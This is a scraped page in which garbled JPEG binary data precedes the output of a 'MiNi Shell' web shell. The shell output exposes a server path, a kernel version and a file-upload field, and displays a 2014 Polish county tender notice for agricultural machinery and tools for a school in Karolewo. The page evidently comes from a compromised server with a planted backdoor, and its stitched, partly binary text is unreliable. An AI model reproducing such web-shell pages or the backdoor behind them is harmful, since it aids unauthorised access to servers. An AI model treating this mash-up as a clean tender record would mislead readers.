JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141205/400624-N-2014.html

<p class="kh_header"><b>Bydgoszcz: DOSTAWA MASZYN I NARZĘDZI DO PRAKTYCZNEJ NAUKI ZAWODÓW ROLNICZYCH W ZESPOLE SZKÓŁ AGRO-EKONOMICZNYCH W KAROLEWIE</b><br>
<b>Numer ogłoszenia: 400624 - 2014; data zamieszczenia: 05.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Bydgoszczy , ul. Konarskiego 1-3/428, 85-066 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5835422, faks 052 5835452.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.bydgoski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MASZYN I NARZĘDZI DO PRAKTYCZNEJ NAUKI ZAWODÓW ROLNICZYCH W ZESPOLE SZKÓŁ AGRO-EKONOMICZNYCH W KAROLEWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Opis przedmiotu zamówienia <br>
1)	Przedmiotem zamówienia jest dostawa, na potrzeby Zespołu Szkół Agro-Ekonomicznych im. Bronisława Zamojdzina w Karolewie, wraz z transportem i rozładunkiem fabrycznie nowych maszyn i narzędzi: <br>
CZĘŚĆ 1<br>
rozsiewacz nawozów, 
przetrząsaczo-zgrabiarka, 
prasa rolująca, 
owijarka bel, 
rozdrabniacz do okopowych, 
rozdrabniacz bijakowy,
pług obracalny, 
agregat uprawowy przedsiewny<br>
CZĘŚĆ 2<br>
glebogryzarka,
kultywator spalinowy,
kosiarka spalinowa,
kosa spalinowa,
podkaszarka,
rębak do gałęzi.<br>
2)	Szczegółowy opis przedmiotu zamówienia zawiera specyfikacja techniczno-użytkowa maszyn i narzędzi (zał. nr 1 do SIWZ).<br>
3)	Po dostarczeniu i uruchomieniu przedmiotu zamówienia, Wykonawca na własny koszt, przeprowadzi instruktaż oraz pokaz pracy dostarczonych maszyn i narzędzi oraz przeszkoli pracowników Zespołu Szkół Agro-Ekonomicznych w Karolewie w zakresie ich obsługi i podstawowych czynności serwisowych. Wykonawca dołączy do maszyn dokumenty (np. instrukcje obsługi) sporządzone w języku polskim, które będą w sposób jasny, zrozumiały i niewprowadzający w błąd przekazywały  informacje, wystarczające do prawidłowego i pełnego korzystania z dostarczanego towaru.<br>
4)	Zamawiający wymaga, aby maszyny i narzędzia będące przedmiotem zamówienia:<br>
były fabrycznie nowe, nieużywane, wyprodukowane nie wcześniej niż w 2013 roku,<br>
były wolne od wad fizycznych i prawnych, posiadały odpowiednie certyfikaty bezpieczeństwa<br>
posiadały wpis w książce gwarancji, dotyczący informacji o okresie obowiązywania gwarancji, z uwzględnieniem wymagań Zamawiającego by bieg okresu gwarancyjnego rozpoczął się z chwilą podpisania przez strony protokołu zdawczo- odbiorczego.<br>
maszyny które będą poruszały się po drogach publicznych muszą spełniać wymogi techniczne, o których mowa w ustawie z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz. U. z 2012 r. poz. 1137, z późn. zm.) oraz wydanych na jej podstawie przepisach wykonawczych, oraz posiadać elementy odblaskowe.<br>
5)	Warunki eksploatacji przedmiotu zamówienia:<br>
Maszyny będą narażone na czynniki pogodowe spotykane w polskiej strefie klimatycznej, ze względu na stałą eksploatację. Garażowane będą w pomieszczeniu zamkniętym.<br>
2.	Wypełniony i podpisany przez Wykonawcę formularz specyfikacji techniczno-użytkowej (załącznik 5a lub/i 5b do Oferty) stanowi oświadczenie Wykonawcy potwierdzające spełnianie przez oferowaną dostawę wymagań określonych przez Zamawiającego dla zamówienia, zgodnie z art. 25 ust. 1 pkt 2 ustawy Prawo Zamówień Publicznych i musi być dołączony do Oferty.<br>
3.	Wymagania stawiane Wykonawcy:<br>
1)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi 
i jakościowymi opisanymi dla przedmiotu zamówienia;<br>
2)	Wymagana jest należyta staranność przy realizacji zobowiązań umowy;<br>
3)	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;<br>
4)	Wykonawca poda numery telefonów kontaktowych i fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia;<br>
5)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br>
4.	Wymagania dotyczące gwarancji<br>
1)	Wykonawca zobowiązuje się do dostarczenia ostemplowanych kart gwarancyjnych w języku polskim objętej gwarancją części przedmiotu zamówienia.<br>
2)	Wykonawca zobowiązuje się do udzielenia gwarancji na prawidłowe działanie dostarczonych maszyn i narzędzi na okres min. 12 miesięcy, licząc od dnia podpisania protokołu zdawczo-odbiorczego, o ile w złożonej ofercie nie wskaże dłuższego okresu.<br>
3)	Wykonawca zobowiązuje się przenieść na Zamawiającego wszelkie uprawnienia z tytułu gwarancji udzielonych przez dostawców produktów, wydając w tym celu Zamawiającemu właściwe dokumenty gwarancyjne, najpóźniej w chwili podpisania protokołu końcowego odbioru przedmiotu zamówienia.<br>
4)	W przypadku wystąpienia w okresie gwarancji wad, usterek w przedmiocie zamówienia, Zamawiający zawiadamia Wykonawcę o powstałych wadach, a Wykonawca zobowiązuję się w terminie uzgodnionym przez strony do ich bezwzględnego i bezpłatnego usunięcia. Niedotrzymanie uzgodnionego terminu upoważnia Zamawiającego do ich usunięcia na koszt Wykonawcy oraz naliczenia kar umownych w wysokości określonej w zawartej umowie.<br>
5)	Wszelkie koszty związane z naprawą przedmiotu zamówienia w ramach gwarancji ponosi w całości Wykonawca.<br>
6)	Opóźnienie w wykonaniu zamówienia lub obowiązków gwarancyjnych dłuższe niż 14 dni równoznaczne jest z nie zrealizowaniem dostawy albo z nie zrealizowaniem obowiązków wynikających z gwarancji i uprawnia Zamawiającego do dochodzenia roszczeń.<br>
7)	Okres trwania gwarancji będzie automatycznie wydłużony o czas trwania naprawy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 7 ustawy, do 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 16.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.<br>
W związku z tym iż, Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku, za jego spełnienie uzna złożone oświadczenie, zgodnie z art. 44 UPZP, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do Oferty,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.<br>
W związku z tym iż, Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku, za jego spełnienie uzna złożone oświadczenie, zgodnie z art. 44 UPZP, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do Oferty,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.<br>
W związku z tym iż, Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku, za jego spełnienie uzna złożone oświadczenie, zgodnie z art. 44 UPZP, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do Oferty,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.<br>
W związku z tym iż, Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku, za jego spełnienie uzna złożone oświadczenie, zgodnie z art. 44 UPZP, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do Oferty,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.<br>
W związku z tym iż, Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku, za jego spełnienie uzna złożone oświadczenie, zgodnie z art. 44 UPZP, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do Oferty,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja jakości - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może być dokonana w sytuacji zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:<br>
a)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;<br>
b)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności Instytucją Zarządzającą, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia;<br>
c)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego lub wytycznych i zaleceń Instytucji Zarządzającej;<br>
d)	gdy wystąpią obiektywne przeszkody tak po stronie zamawiającego, jak i Wykonawcy, uniemożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji projektu;<br>
e)	zmian regulacji prawnych obowiązujących w dniu zawarcia umowy, w tym zmiany obowiązującej stawki podatku od towarów i usług (VAT),<br>
f)	zmian teleadresowych Stron umowy określonych w umowie.<br>
Zmiana terminu realizacji przedmiotu zamówienia może być dokonana, w przypadku:<br>
a)	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego;<br>
b)	działania siły wyższej, uniemożliwiającego wykonanie zamówienia w określonym pierwotnie terminie;<br>
c)	wystąpienia obiektywnych czynników niezależnych od Zamawiającego 
i Wykonawcy.<br>
Powyższe zmiany stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia zgody.<br>
Zmiana postanowień Umowy może nastąpić za zgodą obu stron wyrażoną na piśmie 
w postaci kolejnych aneksów, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.bydgoski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bydgoszczy,  Wydział Rozwoju i Funduszy Europejskich, ul. Konarskiego 1-3, 85-811 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2014 godzina 09:45, miejsce: Starostwo Powiatowe w Bydgoszczy, ul. Konarskiego 1-3, 85-811 Bydgoszcz KANCELARIA OGÓLNA IVp, p. 448.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia realizowany jest w ramach projektu Remont i adaptacja sal dydaktycznych do praktycznej nauki zawodów rolniczych w ZSAE w Karolewie, współfinansowanego ze środków Unii Europejskich w ramach Oś priorytetowa 3 Rozwój infrastruktury społecznej, działanie 3.1 Rozwój infrastruktury edukacyjnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Maszyny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rozsiewacz nawozów, szt.	1,	Szer. Robocza: 9-18 m, Zbiornik: 800 + 400 kg, Otwieranie zsypów mechaniczne  lub hydrauliczne,Dwie tarcze wysiewające,
Napęd WOM (wał odbioru mocy), zawieszany<br>
2	Przetrząsaczo zgrabiarka, szt.	1,	Szerokość robocza  min. 300 cm, 
Szerokość transportowa do 300 cm, napęd WOM, karuzelowa<br>
3	Prasa rolująca, szt. 1,	Prasa walcowa
Podbieracz 1,4-1,8 m, Średnica bel 1,2 m
Stało komorowa, Napęd WOM,System owijania siatką, Mechaniczna blokada tylnej klapy<br>
4	Owijarka bel, szt. 1, Stacjonarna, zawieszana, owijanie folią 500 lub 750 mm
Średnica owijanych bel  1200 mm, Szerokość owijanych bel do 1250 mm<br>
5	Pług obracalny, szt. 1,	Obrót hydrauliczny siłownikiem, zabezpieczenia hydrauliczne non-stop, liczba korpusów 3+(trzy z możliwością zamontowania czwartego), zapotrzebowanie mocy 90 KM, zawieszany, ścinacze skib, zabezpieczenie sprężynowe kroju, ogumione koło podporowe, regulacja szerokości orki
6	Agregat uprawowy przedsiewny, szt. 1,	Wał przedni strunowo-płaskownikowy 300-350 mm- 9 strunowy, trzyrzędowa sekcja zębów sprężystych, szerokość robocza 3,5- 4,0 m, hydraulicznie składany, wyposażony w tylne wałki doprawiające strunowe
7	Rozdrabniacz do okopowych, szt. 1,  Rozdrabniacz uniwersalny z możliwością rozdrabniania okopowych, ziarna zbóż i nasion roślin strączkowych, napęd silnikiem elektrycznym, z wózkiem i z silnikiem elektrycznym, moc silnika 7,5 kW
8	Rozdrabniacz bijakowy, szt. 1, Do rozdrabniania ziarna zbóż i nasion roślin strączkowych, napęd silnikiem elektrycznym , ssąco-tłoczący,  moc silnika 11 kW.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja jakości - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Narzedzia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Glebogryzarka, szt. 1,	Moc do 5KM (zakres 3,2-5 KM maksymalna), silnik spalinowy, szerokość robocza 45-50 cm (maksymalna), średnica zespołu roboczego 30-32 cm, napęd 1V + 1R (jeden bieg do przodu i jeden bieg do tyłu) <br>
2	Kultywator spalinowy, szt. 1,	Moc do 5 KM nie mniejsza niż 3,0 KM, szerokość robocza 50 cm- maksymalna w zakresie 38-50 cm, stopniowa regulacja głębokości pracy<br>
3	Kosiarka spalinowa, szt. 1,	Trójkołowa, szerokość robocza +/- 50 cm, silnik 3,0-3,5 KM,), wyposażenie w elementy antywibracyjne, praca z wyrzutem bocznym lub jako kosiarka mulczująca, kilkustopniowa regulacja wysokości koszenia <br>
4	Kosa spalinowa	1	Szerokość robocza: +/- 40 cm, moc silnika min. 3 KM, głowica żyłkowa, nóż tnący, system antywibracyjny, uchwyt wielofunkcyjny oburęczny, regulacja uchwytu <br>
5	Podkaszarka, szt. 1,	Moc 1 KM, głowica żyłkowa, uchwyt wielofunkcyjny, system antywibracyjny<br>
6	Rębarka do gałęzi, szt. 1,	Spalinowa, silnik +/- 6 KM,  średnica rozdrabnianych gałęzi min. 45 mm, <br>
<br>
DOTYCZY CZĘŚCI 1 i 2:
Wszystkie oferowane maszyny i narzędzia mają posiadać jakość zapewniającą profesjonalne, bezawaryjne działanie, zgodnie z ich przeznaczeniem. 
Wykonawca zapewni serwis gwarancyjny przez okres określony w ofercie, nie którzy 
niż 12 miesięcy. Dostarczony sprzęt ma być fabrycznie nowy, nieużywany.<br>

Przedmiot zamówienia obejmuje koszty dostawy, przeprowadzenie instruktażu oraz pokazu pracy dostarczonych maszyn i narzędzi oraz szkolenia wprowadzającego. Szkolenie to będzie przeprowadzone w miejscu dostawy narzędzi, dla  pracowników Zespołu Szkół Agro-Ekonomicznych w Karolewie, 86-022 Dobrcz w terminie uzgodnionym z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja jakości - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com